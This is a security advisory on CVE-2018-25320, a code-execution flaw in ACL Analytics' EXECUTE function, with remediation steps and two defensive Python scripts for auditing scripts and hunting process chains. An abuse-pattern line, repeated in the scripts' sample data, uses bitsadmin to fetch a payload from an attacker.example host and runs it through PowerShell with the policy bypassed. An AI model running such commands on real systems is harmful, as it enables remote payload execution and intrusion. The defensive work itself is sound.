COSMICBYTEZLABS
© 2026 CosmicBytez Labs. All rights reserved.
CVE-2018-25320: ACL Analytics Arbitrary Code Execution via EXECUTE Function

Critical Security Alert

This vulnerability is actively being exploited. Immediate action is recommended.


ACL Analytics versions 11.x through 13.0.0.579 contain a critical arbitrary code execution vulnerability (CVSS 9.8) allowing attackers to run arbitrary OS...

Dylan H.

Security Team

May 18, 2026
4 min read

Affected Products

  • ACL Analytics 11.x through 13.0.0.579

Executive Summary

CVE-2018-25320 is a critical arbitrary code execution vulnerability in ACL Analytics (versions 11.x through 13.0.0.579) with a CVSS score of 9.8. The flaw allows an attacker to execute arbitrary operating system commands by abusing the built-in EXECUTE function within the ACL scripting environment. Successful exploitation enables attackers to download and run malicious payloads — including PowerShell scripts fetched via bitsadmin — establishing persistent SYSTEM-level access.

Despite its 2018 CVE identifier, this vulnerability was formally catalogued by NVD in May 2026 and represents a significant risk for organizations still running unpatched ACL Analytics installations.


Vulnerability Overview

Attribute            Value
CVE ID               CVE-2018-25320
CVSS Score           9.8 (Critical)
Type                 Arbitrary Code Execution
Attack Vector        Network / Local (via ACL script execution)
Authentication       Low — user must have ACL scripting access
Privileges Required  Low
User Interaction     None
Affected Versions    ACL Analytics 11.x – 13.0.0.579

Root Cause

ACL Analytics exposes an EXECUTE function within its scripting language that can be used to invoke arbitrary operating system commands. This function lacks sufficient sandboxing or allow-listing controls, enabling an attacker with access to the ACL scripting environment to run any command under the process's security context — typically SYSTEM privileges.


Attack Chain

1. Attacker gains access to ACL Analytics scripting environment
   (e.g., compromised user credentials, insider, or phishing)
2. Crafts an ACL script invoking the EXECUTE function with a malicious payload
3. EXECUTE calls bitsadmin to download a PowerShell script from attacker-controlled server
4. PowerShell script executes with SYSTEM privileges
5. Attacker establishes persistence, exfiltrates audit data, or pivots laterally

Example Abuse Pattern

EXECUTE CMD "bitsadmin /transfer job https://attacker.example/payload.ps1 C:\payload.ps1 && powershell -ep bypass -f C:\payload.ps1"

The use of bitsadmin as a living-off-the-land binary (LOLBin) is a well-documented technique that often bypasses signature-based AV detection, making this attack particularly stealthy.


Why ACL Analytics Is a High-Value Target

ACL Analytics is widely deployed in enterprise audit, compliance, and risk management workflows, often with direct access to:

  • Financial records and general ledger data
  • ERP system integrations (SAP, Oracle, PeopleSoft)
  • HR and payroll data
  • Procurement and vendor data

A compromise of an ACL Analytics installation can yield access to sensitive financial and compliance data without triggering traditional security tooling that focuses on endpoint behavior rather than audit software.


Affected Versions and Remediation

Product                              Affected       Status
ACL Analytics 11.x                   Yes            Upgrade required
ACL Analytics 12.x                   Yes            Upgrade required
ACL Analytics 13.0.0.579 and below   Yes            Upgrade required
ACL Analytics 13.1.0+                No — patched   Apply immediately

Immediate Actions

  1. Upgrade to ACL Analytics 13.1.0 or later immediately
  2. Audit all existing ACL scripts for use of the EXECUTE function
  3. Review access to the ACL scripting environment — restrict to authorized audit personnel only
  4. Enable logging on all ACL script execution events and forward to SIEM
  5. Hunt endpoint logs for bitsadmin or PowerShell invocations originating from ACL processes
  6. Network controls — block outbound bitsadmin/BITS transfers from audit workstations if not operationally required
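Step 2 (audit existing ACL scripts for EXECUTE) and the takeaway about reviewing scripts for unauthorized additions can be turned into a repeatable check. The script below is an added example, not code from the advisory or from the vendor: it scans ACL script text for EXECUTE statements, tags each hit with the risk indicators the advisory names (bitsadmin, PowerShell, execution-policy bypass, a remote URL), and compares the exact command against an approved baseline so that anything not previously reviewed stands out. The sample scripts are constructed for this example; the .aclscript extension and COMMENT-prefixed comment lines are assumptions about the script format.

```python
"""Inventory audit of ACL scripts for EXECUTE usage (added example)."""
import hashlib
import re

# EXECUTE at the start of a statement; the rest of the line is the command text.
EXECUTE_RE = re.compile(r"^\s*EXECUTE\b(.*)$", re.IGNORECASE)
# Assumption: ACL comment lines begin with the COMMENT keyword.
COMMENT_RE = re.compile(r"^\s*COMMENT\b", re.IGNORECASE)

# Risk indicators taken from the abuse pattern described in the advisory.
RISK_PATTERNS = [
    (re.compile(r"\bbitsadmin\b", re.I), "bitsadmin LOLBin"),
    (re.compile(r"\bpowershell\b", re.I), "PowerShell invocation"),
    (re.compile(r"-e(?:p|x\w*)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"https?://", re.I), "remote URL"),
]


def fingerprint(line: str) -> str:
    """Whitespace- and case-insensitive hash of an EXECUTE line, used as the
    baseline key so cosmetic reformatting cannot hide a changed command."""
    normalized = " ".join(line.split()).lower()
    return hashlib.sha256(normalized.encode("utf-8")).hexdigest()


def scan_script(name: str, text: str, approved: set) -> list:
    """Return one finding per EXECUTE statement in a script."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if COMMENT_RE.match(line):
            continue  # the word EXECUTE inside a comment is noise, not a command
        match = EXECUTE_RE.match(line)
        if not match:
            continue
        command = match.group(1)
        tags = [tag for pattern, tag in RISK_PATTERNS if pattern.search(command)]
        findings.append({
            "file": name,
            "line": lineno,
            "command": line.strip(),
            "tags": tags,
            "approved": fingerprint(line) in approved,
        })
    return findings


def audit(scripts: dict, approved: set) -> list:
    """Audit every script; unapproved hits with risk tags are reviewed first."""
    return [f for name, text in scripts.items()
            for f in scan_script(name, text, approved)]


# --- constructed sample data (hypothetical scripts, not from any real deployment) ---
APPROVED_EXECUTE = 'EXECUTE "robocopy \\\\fileserver\\exports C:\\ACL\\out /E"'

SAMPLE_SCRIPTS = {
    "reconcile_gl.aclscript": "\n".join([
        "COMMENT Nightly GL reconciliation; EXECUTE below copies the export set",
        "OPEN GL_2025",
        APPROVED_EXECUTE,
        "SUMMARIZE ON Account ACCUMULATE Amount TO GL_totals",
    ]),
    "vendor_check.aclscript": "\n".join([
        "OPEN Vendors",
        # Lower-case keyword plus the advisory's abuse pattern, planted as an unreviewed addition.
        'execute CMD "bitsadmin /transfer job https://attacker.example/payload.ps1 '
        'C:\\payload.ps1 && powershell -ep bypass -f C:\\payload.ps1"',
    ]),
}
BASELINE = {fingerprint(APPROVED_EXECUTE)}


def run_sample() -> list:
    return audit(SAMPLE_SCRIPTS, BASELINE)


if __name__ == "__main__":
    for f in run_sample():
        status = "approved" if f["approved"] else "UNAPPROVED"
        print(f'{f["file"]}:{f["line"]} [{status}] {", ".join(f["tags"]) or "no risk tags"}')
        print("    " + f["command"])
```

The baseline is keyed on a normalized hash of the whole EXECUTE line rather than on the file name, so an approved script that later gains a second EXECUTE, or whose command string is edited, produces an unapproved finding on the next run.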

Detection

Endpoint

Indicator                                        Description
bitsadmin.exe spawned by ACL process             LOLBin abuse for payload download
powershell.exe -ep bypass from ACL context       Script execution with execution policy bypass
Unusual outbound HTTP(S) from ACL workstations   C2 or payload retrieval

SIEM / EDR Queries

Look for process chains where ACLAnalytics.exe or related ACL processes spawn cmd.exe, bitsadmin.exe, or powershell.exe. This is highly anomalous and should trigger immediate investigation.
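The process-chain logic described above, written out as an added example that is not part of the advisory: it walks process-creation events carrying Sysmon Event ID 1 style fields (ProcessId, ParentProcessId, Image, CommandLine) and flags cmd.exe, bitsadmin.exe or powershell.exe whose ancestry leads back to an ACL process, either directly or through an intermediate cmd.exe as in the abuse pattern. The events are constructed sample data, and `ACLAnalytics.exe` is the image name the advisory uses; confirm the real binary name on your own install before deploying this logic in a SIEM or EDR rule.

```python
"""Process-chain hunt for ACL Analytics spawning LOLBins (added example)."""
import re

ACL_IMAGES = {"aclanalytics.exe"}                   # name from the advisory; verify locally
SHELL_IMAGES = {"cmd.exe"}                          # intermediate hop in the abuse pattern
LOLBIN_IMAGES = {"bitsadmin.exe", "powershell.exe"}

BITS_TRANSFER_RE = re.compile(r"/transfer\b", re.I)
EP_BYPASS_RE = re.compile(r"-e(?:p|x\w*)\s+bypass", re.I)  # -ep / -ex / -ExecutionPolicy Bypass


def image_name(path: str) -> str:
    """Lower-cased file name from a Windows image path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def acl_ancestor(event: dict, by_pid: dict, max_depth: int = 3):
    """Return the ACL ancestor event if every hop between it and `event` is a
    shell (cmd.exe); otherwise None.  Depth is capped so a stale parent table
    cannot send the walk in circles after PID reuse."""
    current = event
    for _ in range(max_depth):
        parent = by_pid.get(current["ParentProcessId"])
        if parent is None:
            return None
        name = image_name(parent["Image"])
        if name in ACL_IMAGES:
            return parent
        if name not in SHELL_IMAGES:
            return None
        current = parent
    return None


def hunt(events: list) -> list:
    """Flag shells and LOLBins whose ancestry leads back to an ACL process."""
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for event in events:
        name = image_name(event["Image"])
        if name not in SHELL_IMAGES | LOLBIN_IMAGES:
            continue
        ancestor = acl_ancestor(event, by_pid)
        if ancestor is None:
            continue
        reasons = [f"{image_name(ancestor['Image'])} is an ancestor of {name}"]
        cmd = event["CommandLine"]
        if name == "bitsadmin.exe" and BITS_TRANSFER_RE.search(cmd):
            reasons.append("BITS transfer (payload download)")
        if name == "powershell.exe" and EP_BYPASS_RE.search(cmd):
            reasons.append("execution policy bypass")
        findings.append({
            "ProcessId": event["ProcessId"],
            "Image": name,
            "severity": "high" if name in LOLBIN_IMAGES else "medium",
            "reasons": reasons,
        })
    return findings


# --- constructed sample events using Sysmon Event ID 1 field names ------------
SAMPLE_EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 1, "Image": r"C:\Windows\explorer.exe",
     "CommandLine": "explorer.exe"},
    {"ProcessId": 200, "ParentProcessId": 100, "Image": r"C:\Program Files\ACL\ACLAnalytics.exe",
     "CommandLine": '"ACLAnalytics.exe"'},
    {"ProcessId": 300, "ParentProcessId": 200, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c bitsadmin /transfer job https://attacker.example/payload.ps1 "
                    r"C:\payload.ps1 && powershell -ep bypass -f C:\payload.ps1"},
    {"ProcessId": 301, "ParentProcessId": 300, "Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job https://attacker.example/payload.ps1 C:\payload.ps1"},
    {"ProcessId": 302, "ParentProcessId": 300,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ep bypass -f C:\payload.ps1"},
    # Benign: an analyst opening PowerShell from the desktop is not an ACL child.
    {"ProcessId": 400, "ParentProcessId": 100,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
]


def run_sample() -> list:
    return hunt(SAMPLE_EVENTS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"[{f['severity']}] pid {f['ProcessId']} {f['Image']}: {'; '.join(f['reasons'])}")
```

A bare cmd.exe under the ACL process is reported at medium severity because the advisory's chain passes through it; bitsadmin.exe and powershell.exe are high, and the command-line checks add the specific indicators from the detection table so an analyst sees why the alert fired without re-reading the raw event.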


Key Takeaways

  1. CVSS 9.8 — Arbitrary OS code execution via built-in EXECUTE function
  2. ACL Analytics targets are audit and compliance infrastructure with access to sensitive financial data
  3. Upgrade to 13.1.0+ immediately; the patch removes unsafe execution capabilities
  4. Living-off-the-land abuse (bitsadmin + PowerShell) makes exploitation stealthy
  5. Audit ACL script inventories — review all scripts using EXECUTE for unauthorized additions

References

  • NVD — CVE-2018-25320
  • MITRE CVE Entry
  • CISA — Known Exploited Vulnerabilities Catalog
Tags: CVE-2018-25320, ACL Analytics, RCE, Code Execution, Audit Software
